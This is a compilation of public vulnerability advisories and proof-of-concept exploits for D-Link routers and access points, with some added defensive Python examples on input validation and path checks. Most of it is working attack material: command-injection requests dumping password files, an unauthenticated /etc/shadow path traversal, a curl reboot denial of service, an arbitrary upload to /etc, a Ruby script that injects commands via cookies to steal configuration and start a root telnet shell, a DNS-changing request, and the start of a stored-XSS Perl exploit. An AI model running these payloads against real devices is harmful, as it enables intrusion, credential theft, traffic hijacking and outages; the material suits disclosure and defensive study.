Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. Any web browser can be used to log in to the D-Link DWL-2600AP.

Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)


Exploitation Technique:
=======================
Local


Severity Level:
===============
HIGH

CVE: CVE-2019-20499
CVE: CVE-2019-20500
CVE: CVE-2019-20501


Base Score (CVSS):
===============
7.8

===============
Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=config_restore

Vulnerable POST Form Data Parameter:
[+] configRestore
[+] configServerip
===========================
Device Firmware version :
[+] 4.2.0.15

Hardware Version :
[+] A1

Device name :
[+] D-Link AP

Product Identifier : 
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by authenticated attackers with access to the web interface.
There is no input validation on the POST form data parameters "configRestore"
and "configServerip": both values are passed directly into the tftp command line that the device runs through /bin/sh, so shell metacharacters in either field allow an attacker to execute arbitrary operating system commands on the device.
The attacker has to know the credentials in order to access the panel.
To reproduce the issue, follow the information in the attached Screenshot2.jpg.


--- PoC Session Logs ---
POST /admin.cgi?action=config_restore HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 357
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; 
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_restore
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E

------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="optprotocol"

up
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configRestore"

;whoami;
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configServerip"

;cat /var/passwd;cat /var/passwd
------WebKitFormBoundary4ZAwHsdySFjwNXxE--


----------->Response----------->

HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
	-l FILE	Local FILE
	-r FILE	Remote FILE
	-g	Get file
	-p	Put file
	-b SIZE	Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note: for testing, put the values in the fields like this:
;command1;same_command1;command2;command2
The BusyBox build on this firmware has no whoami applet, so the two "sh: whoami: not found" lines are themselves proof that the injected tokens reached a shell. The tftp usage text appears because the injected ';' cuts off tftp's argument list, leaving "-r" without a value; the /var/passwd contents that follow come from the second injected command.


----+Discovered By Raki Ben Hamouda----+


Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. Any web browser can be used to log in to the D-Link DWL-2600AP.

Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)


Exploitation Technique:
=======================
Local


Severity Level:
===============
HIGH

Base Score (CVSS):
===============
7.8

===============
Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=config_save

Vulnerable POST Form Data Parameter:
[+] configBackup
[+] downloadServerip
==========================
Device Firmware version :
[+] 4.2.0.15

Hardware Version :
[+] A1

Device name :
[+] D-Link AP

Product Identifier : 
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by authenticated attackers with access to the web interface.
There is no input validation on the POST form data parameters "configBackup"
and "downloadServerip": both values are passed directly into the tftp command line that the device runs through /bin/sh, so shell metacharacters in either field allow an attacker to execute arbitrary operating system commands on the device.
The attacker has to know the credentials in order to access the panel.
To reproduce the issue, follow the information in the attached Screenshot3.jpg.

--- PoC Session Logs ---
POST /admin.cgi?action=config_save HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_save
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E

check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd


----------->Response----------->

HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
	-l FILE	Local FILE
	-r FILE	Remote FILE
	-g	Get file
	-p	Put file
	-b SIZE	Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
sh: .xml: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note: for testing, put the values in the fields like this:
;command1;same_command1;command2;etc...


----+Discovered By Raki Ben Hamouda----+


Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. Any web browser can be used to log in to the D-Link DWL-2600AP.

Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)


Exploitation Technique:
=======================
Local


Severity Level:
===============
HIGH

Base Score (CVSS):
===============
7.8

===============
Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=upgrade

Vulnerable POST Form Data Parameter:
[+] firmwareRestore
[+] firmwareServerip

===========================
Device Firmware version :
[+] 4.2.0.15

Hardware Version :
[+] A1

Device name :
[+] D-Link AP

Product Identifier : 
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by authenticated attackers with access to the web interface.
There is no input validation on the POST form data parameters "firmwareRestore"
and "firmwareServerip": both values are passed directly into the tftp command line that the device runs through /bin/sh, so shell metacharacters in either field allow an attacker to execute arbitrary operating system commands on the device.
The attacker has to know the credentials in order to access the panel.
To reproduce the issue, follow the information in the attached Screenshot1.jpg.

--- PoC Session Logs ---

POST /admin.cgi?action=upgrade HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 525
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: xxxxxxxxw
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=upgrade
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E

------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="optprotocol"

up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareRestore"

;whoami;whoami
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareServerip"

;cat /var/passwd;cat /var/passwd
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"

up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL--

----------->Response----------->

HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
	-l FILE	Local FILE
	-r FILE	Remote FILE
	-g	Get file
	-p	Put file
	-b SIZE	Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note: for testing, put the values in the fields like this:
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
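The three DWL-2600AP findings above (config_restore, config_save and upgrade) share one bug: a file name and a server address typed into a form are spliced into a tftp command line that /bin/sh executes. The script below is an added example, not code from the advisory or from D-Link. admin.cgi is closed source, so the exact command template is an assumption; what the advisory does show is the response pattern (tftp's usage text because "-r" lost its argument, then the output of the injected commands), and the example reproduces that split. The hardened version validates both fields against an allow-list and builds an argv list for a shell-free exec.

```python
"""Added example, not code from the advisory or from D-Link: models the
shape of the bug the three DWL-2600AP findings share, and the fix.

admin.cgi is closed source, so the exact tftp command line it builds is an
assumption. The advisory does show that the file-name field and the
server-ip field end up inside a tftp invocation that /bin/sh runs, so a
';' in either field terminates tftp's arguments and starts a new command."""
import ipaddress
import re
import shlex

# Assumed shape of the vulnerable template (the real one is not on the page).
VULN_TEMPLATE = "/usr/bin/tftp -g -r {file} -l /tmp/config.xml {server}"


def build_vulnerable(file_name, server_ip):
    """String concatenation straight into a shell command line: the bug."""
    return VULN_TEMPLATE.format(file=file_name, server=server_ip)


def shell_commands(cmdline):
    """Split a command line at unquoted ';' the way `sh -c` would and return
    the list of simple commands. Used only to show what the payload becomes."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=";")
    cmds, cur = [], []
    for tok in lex:
        if tok == ";":
            if cur:
                cmds.append(" ".join(cur))
            cur = []
        else:
            cur.append(tok)
    if cur:
        cmds.append(" ".join(cur))
    return cmds


# A plain file name: alphanumeric start, then up to 63 safe characters.
FILE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def validate_tftp_args(file_name, server_ip):
    """Allow-list validation: a plain file name and a literal IPv4 address
    (hostnames are deliberately refused). Anything else raises ValueError
    before a process is ever spawned."""
    if not FILE_NAME_RE.fullmatch(file_name):
        raise ValueError("rejected file name: %r" % file_name)
    try:
        ipaddress.IPv4Address(server_ip)
    except ValueError:
        raise ValueError("rejected server address: %r" % server_ip) from None
    return file_name, server_ip


def build_hardened(file_name, server_ip):
    """argv form for subprocess.run(argv) with no shell: even if validation
    were bypassed, ';' would reach tftp as data, not the shell as syntax."""
    name, addr = validate_tftp_args(file_name, server_ip)
    return ["/usr/bin/tftp", "-g", "-r", name, "-l", "/tmp/config.xml", addr]


if __name__ == "__main__":
    # Payloads copied from the config_restore request in the advisory.
    payload_file, payload_ip = ";whoami;", ";cat /var/passwd;cat /var/passwd"
    print("vulnerable command line:", build_vulnerable(payload_file, payload_ip))
    for cmd in shell_commands(build_vulnerable(payload_file, payload_ip)):
        print("  sh runs:", cmd)
    for args in ((payload_file, payload_ip), ("config.xml", "192.168.1.10")):
        try:
            print("hardened:", build_hardened(*args))
        except ValueError as err:
            print("hardened:", err)
```

Run stand-alone, the vulnerable path prints five separate commands for the advisory's two fields, the first being a tftp with a dangling "-r" and the last two the `cat /var/passwd` that dumped the password file; the hardened path rejects both payloads and only ever hands a clean argv to the exec call.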
            
# Exploit Title: [DLink DVG-N5402SP Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.dlink.com/]
# Versions Reported: [Multiple - See below]
# CVE-IDs: [CVE-2015-7245 + CVE-2015-7246 + CVE-2015-7247]


*DLink DVG-N5402SP File Path Traversal, Weak Credentials Management, and
Sensitive Info Leakage Vulnerabilities*
*Vulnerable Models, Firmware, Hardware versions*
DVG-N5402SP Web Management
Model Name : GPN2.4P21-C-CN
Firmware Version : W1000CN-00
Firmware Version : W1000CN-03
Firmware Version : W2000EN-00
Hardware Platform : ZS
Hardware Version : Gpn2.4P21-C_WIFI-V0.05

Device can be managed through three users:
1. super - full privileges
2. admin - full privileges
3. support - restricted user

*1. Path traversal*
Arbitrary files can be read off the device file system through the 'errorpage'
parameter of /cgi-bin/webproc. No authentication is required: the request below
carries bogus credentials (blah/blah) and still returns /etc/shadow.
*CVE-ID*: CVE-2015-7245

*HTTP Request*

POST /cgi-bin/webproc HTTP/1.1
Host: <IP>:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>:8080/cgi-bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

getpage=html%2Findex.html&errorpage=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var%
&obj-action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

*HTTP Response*

HTTP/1.0 200 OK
pstVal->name:getpage; pstVal->value:html/main.html
pstVal->name:getpage; pstVal->value:html/index.html
pstVal->name:errorpage; pstVal->value:../../../../../../../../../../../etc/shadow
pstVal->name:var:menu; pstVal->value:setup
pstVal->name:var:page; pstVal->value:connected
pstVal->name:var:subpage; pstVal->value:-
pstVal->name:obj-action; pstVal->value:auth
pstVal->name::username; pstVal->value:super
pstVal->name::password; pstVal->value:super
pstVal->name::action; pstVal->value:login
pstVal->name::sessionid; pstVal->value:1ac5da6b
Connection: close
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec-9999 23:59:59 GMT;
path=/

#root:<hash_redacted>:13796:0:99999:7:::
root:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::


*2. Use of Default, Hard-Coded Credentials*
*CVE-ID*: CVE-2015-7246

The device has two system user accounts configured with default passwords
(root:root, tw:tw).
Login - tw - is not active though. Anyone could use the default password to
gain administrative control through the Telnet service of the system (when
enabled), leading to loss of integrity, confidentiality, or availability.

*3. Sensitive info leakage via device running configuration backup*
*CVE-ID*: CVE-2015-7247

Usernames, passwords, keys, values and web account hashes (super & admin)
are stored in clear text and not masked. The restricted 'support' user may
also download this config backup file from the portal directly, gather the
clear-text admin credentials, and gain full, unauthorized access to the device.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
            
# Exploit Title: D-Link DSR-250N 3.12 - Denial of Service (PoC)
# Google Dork: N/A
# Author: RedTeam Pentesting GmbH
# Date: 2020-10-03
# Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de)
# Vendor Homepage: https://www.dlink.com
# Software Link: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
# Version: 3.12 (fixed in 3.17B)
# CVE : CVE-2020-26567

Advisory: Denial of Service in D-Link DSR-250N

RedTeam Pentesting discovered a Denial-of-Service vulnerability in the
D-Link DSR-250N device which allows unauthenticated attackers in the
same local network to execute a CGI script which reboots the device.


Details
=======

Product: D-Link DSR-250N
Affected Versions: 3.12 and potentially later
Fixed Versions: 3.17B
Vulnerability Type: DoS
Security Risk: low
Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
Advisory Status: published
CVE: CVE-2020-26567
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567


Introduction
============

"The D-Link Wireless N Unified Service Router (DSR-250N) provides
enhanced security, functionality and performance over a traditional VPN
router without the complexity of a full firewall solution. The D-Link
Wireless N Unified Service Router is a cost-effective, high performance
solution for securing a small business network."

(from the vendor's homepage)


More Details
============

During a penetration test, the firmware for the D-Link DSR-250N router
was downloaded from D-Link's official website[1] and extracted for
further analysis. It was then confirmed that CGI scripts exist on the
router that can be directly accessed with a web browser, without any
authentication. In particular, the script "upgradeStatusReboot.cgi"
executes the command to reboot the device. Its contents are:

------------------------------------------------------------------------
#!/bin/sh
echo Content-type: text/plain
echo ""
stat=`/sbin/reboot -d 8 &`
echo $stat
------------------------------------------------------------------------

Executing this script renders the device unusable for the time of the
reboot. In tests, it turned out that the device needs roughly four
minutes to complete a reboot. As a consequence, any network using the
device as a switch or router is not accessible during that time, too.
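The finding above came from unpacking the firmware image and reading the CGI directory. As an added example (not part of the RedTeam Pentesting advisory), the script below is a first-pass triage tool for an extracted firmware tree: it lists shell CGI scripts that call privileged commands and flags whether anything that looks like a session check is present, which is exactly how a five-line script such as upgradeStatusReboot.cgi stands out. The sample tree is constructed inside the script; upgradeStatusReboot.cgi is reproduced from the advisory, the other scripts are made up.

```python
"""Added example, not part of the RedTeam Pentesting advisory: triage an
extracted firmware tree for shell CGI scripts that run privileged commands
without any visible authentication check. The sample tree is constructed
below; upgradeStatusReboot.cgi is copied from the advisory, the other
scripts are made up for the demonstration."""
import os
import re
import tempfile

# Commands whose presence in a CGI script deserves a look.
DANGEROUS = re.compile(r"\b(reboot|halt|poweroff|telnetd|passwd|tftp|nvram)\b")
# Crude hint that the script checks who is calling before acting.
AUTH_HINT = re.compile(r"(?i)session|cookie|auth|login")


def scan_cgi_tree(root):
    """Walk `root`; for every file in a directory whose name contains 'cgi'
    (cgi-bin, scgi-bin, ...) that starts with a shell shebang, report the
    privileged commands it calls. Returns a list of dicts sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "cgi" not in os.path.basename(dirpath).lower():
            continue
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    text = fh.read(64 * 1024).decode("utf-8", "replace")
            except OSError:
                continue
            first_line = text.split("\n", 1)[0]
            if not (first_line.startswith("#!") and "sh" in first_line):
                continue  # binaries and non-shell scripts are out of scope here
            commands = sorted(set(DANGEROUS.findall(text)))
            if commands:
                findings.append({
                    "path": os.path.relpath(path, root).replace(os.sep, "/"),
                    "commands": commands,
                    "auth_check": bool(AUTH_HINT.search(text)),
                })
    return sorted(findings, key=lambda f: f["path"])


# Contents of the script quoted in the advisory.
UPGRADE_STATUS_REBOOT = """#!/bin/sh
echo Content-type: text/plain
echo ""
stat=`/sbin/reboot -d 8 &`
echo $stat
"""

# Constructed: a script that does the same job but gates it on a cookie.
GATED_REBOOT = """#!/bin/sh
case "$HTTP_COOKIE" in
  *session=*) ;;
  *) echo "Status: 403 Forbidden"; echo; exit 0 ;;
esac
echo Content-type: text/plain
echo ""
/sbin/reboot -d 8 &
"""

# Constructed: a harmless status script that should not be reported.
STATUS_ONLY = """#!/bin/sh
echo Content-type: text/plain
echo ""
uptime
"""


def demo():
    """Build the sample tree in a temp dir and return the scan findings."""
    root = tempfile.mkdtemp()
    layout = {
        "scgi-bin/upgradeStatusReboot.cgi": UPGRADE_STATUS_REBOOT,
        "scgi-bin/status.cgi": STATUS_ONLY,
        "cgi-bin/gatedReboot.cgi": GATED_REBOOT,
        "etc/init.d/rcS": "#!/bin/sh\n/sbin/reboot\n",  # not a CGI dir: ignored
    }
    for rel, body in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return scan_cgi_tree(root)


if __name__ == "__main__":
    for finding in demo():
        flag = "" if finding["auth_check"] else "  <-- no auth check visible"
        print(finding["path"], finding["commands"], flag)
```

The auth heuristic is only a hint for prioritising manual review: a script that mentions "session" may still check it wrongly, and a script with no such token is the one to open first.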

In the penetration test, the router's web interface was available
directly over the Internet. According to the vendor, the web interface
is by default disabled for the WAN interface.


Proof of Concept
================

An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will
reboot the device:

------------------------------------------------------------------------
$ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi
------------------------------------------------------------------------


Workaround
==========

Access to the D-Link DSR-250N's web interface should only be enabled for
administrators, for example by only allowing access from specific IP
addresses in the firewall. Access over the WAN interface should also be
disabled if it was enabled manually.


Fix
===

A preview firmware version named 3.17B which should correct the issue
was received at the end of September from the vendor. RedTeam Pentesting
was not able to verify the fix due to lack of access to a test device.
However, the formerly accessible CGI script is no longer part of the
firmware.


Security Risk
=============

No authentication is needed to execute the CGI script and thereby reboot
the device. Attackers might abuse this behaviour for targeted
denial-of-service-attacks against D-Link customers, since rebooting the
device interrupts access to networks relying on this device for routing
or switching purposes. However, the attack is only possible if the
attacker resides on the same network, and no further information can be
gathered or control over the devices be obtained. Therefore, the
vulnerability is rated as a low risk.


Timeline
========

2020-06-29 Vulnerability identified
2020-07-03 Customer approved disclosure to vendor
2020-07-03 Requested security contact from vendor via web form
2020-07-03 Vendor replied with contact information
2020-07-07 Advisory provided to vendor
2020-09-28 Vendor provided fixed version to RedTeam Pentesting
2020-10-05 CVE ID requested
2020-10-06 CVE ID assigned
2020-10-08 Advisory released


References
==========

[1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
            
# Exploit Title: D-Link DSP-W Arbitrary file upload
# Date: 30/06/2015
# Exploit Author: DNO
# Vendor Homepage: [link]
# Version: w110 v1.05b01
# Tested on: linux
# CVE :  N/A

========================================

The only 'filtering' on this resource appears to be a sprintf()
call that statically prefixes a submitted 'dev' argument with '/www'.
However, if the HTTP request is sent without a 'dev' argument at all, the
sprintf() call is never reached, and a fully-qualified path can be supplied
in the 'path' parameter, bypassing the upload path restriction. The request
below drops test.txt straight into /etc/.

***************
# Upload arbitrary files to the device.
echo 'Some String' > test.txt
curl \
 -X POST \
 -i \
 -F name=@test.txt \
 --http1.0 \
 '192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
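The DSP-W110 upload bypass and the DVG-N5402SP 'errorpage' traversal (section 1 of the advisory above) are the same mistake from two sides: a string prefix ('/www' + dev) or no check at all, instead of canonicalising the final path and testing that it is still under the web root. The code below is an added example, not code from either advisory or from D-Link; one resolver serves both a read handler and an upload handler, and the web root, page and file names are constructed for the demonstration.

```python
"""Added example, not code from either advisory or from D-Link. One
canonicalisation check closes both bugs on this page: the DVG-N5402SP
'errorpage' read traversal and the DSP-W110 UploadFile 'path' bypass.
The web root is a temporary directory built here; page and file names
are made up."""
import os
import tempfile


class PathRejected(ValueError):
    """Raised when a user-supplied path would leave the web root."""


def resolve_under_root(webroot, user_path):
    """Return the real filesystem path for user_path, which is always treated
    as relative to webroot. Absolute paths are refused outright; '../' runs
    and symlinks are caught by comparing realpath() results rather than by
    prefixing the raw input with '/www' the way the vulnerable sprintf does."""
    if os.path.isabs(user_path):
        raise PathRejected(user_path)
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise PathRejected(user_path)
    return candidate


def read_page(webroot, page):
    """Handler shape of webproc's getpage/errorpage: serve a file under root."""
    with open(resolve_under_root(webroot, page), "rb") as fh:
        return fh.read()


def save_upload(webroot, dest_dir, filename, data):
    """Handler shape of web_cgi.cgi UploadFile: the destination directory and
    the file name are checked separately, so neither can carry a traversal."""
    target_dir = resolve_under_root(webroot, dest_dir)
    if "/" in filename or filename in ("", ".", ".."):
        raise PathRejected(filename)
    os.makedirs(target_dir, exist_ok=True)
    target = os.path.join(target_dir, filename)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def demo():
    """Constructed web root with one page; returns the outcome per request."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "html"))
    with open(os.path.join(root, "html", "index.html"), "wb") as fh:
        fh.write(b"<html>ok</html>")
    results = {}
    # The first traversal string is the one from the DVG-N5402SP request.
    for page in ("html/index.html",
                 "../../../../../../../../../../../etc/shadow",
                 "/etc/shadow"):
        try:
            read_page(root, page)
            results["read " + page] = "served"
        except PathRejected:
            results["read " + page] = "refused"
    # '/etc/' is the path from the DSP-W110 curl request.
    for dest in ("html/uploads", "/etc/", "html/../../../tmp"):
        try:
            save_upload(root, dest, "test.txt", b"Some String")
            results["upload " + dest] = "stored"
        except PathRejected:
            results["upload " + dest] = "refused"
    return results


if __name__ == "__main__":
    for request, outcome in demo().items():
        print("%-8s %s" % (outcome, request))
```

The comparison is done on realpath() output on both sides, so a symlink planted inside the web root that points outside it is refused as well, which a textual check of the request string alone would miss.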

 ========================================

# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
# Date: 30/06/2015
# Exploit Author: DNO
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A

========================================
Severity Level:
===============
High
===============
Patches made to lighttpd by the vendor of this device allow an attacker to
query the device, without authentication, for the following information:

# Current WLAN SSIDs
# Current WLAN channels
# LAN and WAN MAC addressing
# Current firmware version information
# Hardware version information

Although not sensitive in itself, this information allows identification of
devices running vulnerable firmware versions.

=========================================
# Information query.
curl \
192.168.1.3/mplist.txt

========================================
#ruby poc
----

# DSP-W110-Lighttpd PoC.

require 'pp'
require 'optparse'
require 'restclient'

# Set defaults and parse command line arguments
options = {}

options[:addr] = "192.168.0.60"
options[:port] = 80

OptionParser.new do |option|
  option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
    options[:addr] = a
  end

  option.on("--port [PORT]", "Destination TCP port") do |p|
    options[:port] = p
  end

  option.parse!
end

# Define which actions we will be using. The HNAP1 requests carry the
# command to run on the device inside a backtick-quoted cookie value.
actions = [
  {
    :name => "Get device information",
    :call => "txt_parser",
    :path => "mplist.txt",
  },
  {
    :name => "Snatch configuration",
    :call => "noop",
    :path => "HNAP1",
    :cookies => { :cookie => "`cp /etc/co* /www/`" }
  },
  {
    :name => "Fetch configuration",
    :call => "conf_writer",
    :path => "config.sqlite",
  },
  {
    :name => "Enable telnet (root)",
    :call => "noop",
    :path => "HNAP1",
    :cookies => { :cookie => "`telnetd -l/bin/sh`" }
  }
]

def noop(val)
  return
end

def txt_parser(txt)
  txt.split(/\r?\n/).each do |line|
    puts " #{line}"
  end
end

def conf_writer(txt)
  begin
    f = File.open('./config.sqlite', 'wb')
  rescue => e
    puts "[!] Failed to open config.sqlite for writing #{e.message}"
    return
  end
  f.write(txt)
  f.close
  puts "[*] Configuration fetched into 'config.sqlite'"
end

# Iterate over all actions and attempt to execute.
url = "http://#{options[:addr]}:#{options[:port]}"

puts "[!] Attempting to extract information from #{url}"

actions.each do |action|
  # Only send a Cookie header when the action defines one.
  headers = action[:cookies] ? { :cookies => action[:cookies] } : {}

  # Fire the request and ensure a 200 OKAY.
  begin
    response = RestClient.get("#{url}/#{action[:path]}", headers)
  rescue
    puts "[!] Failed to query remote host."
    abort
  end

  if response.code != 200
    puts "[-] '#{action[:name]}' failed with response: #{response.code}"
    next
  end

  # Send to the processor.
  puts "[*] #{action[:name]} request succeeded."
  send(action[:call], response.body)
end
===================================

 contact me FB : FB.COM/haker.dyno
 Copyright © 2015 /DNO/
            
  D-Link DSL-526B ADSL2+ AU_2.01 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"  
    var dns2 = '8.8.8.8';
            
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

	my $ip = $ARGV[0];

	my $user = $ARGV[1];

	my $pass = $ARGV[2];
		

		if (@ARGV != 3){

			print "\n";
			print "XLabs Information Security www.xlabs.com.br\n";
			print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
			print "Developed by Mauricio Correa\n";
			print "Contact: mauricio\@xlabs.com.br\n";
			print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

		}else{

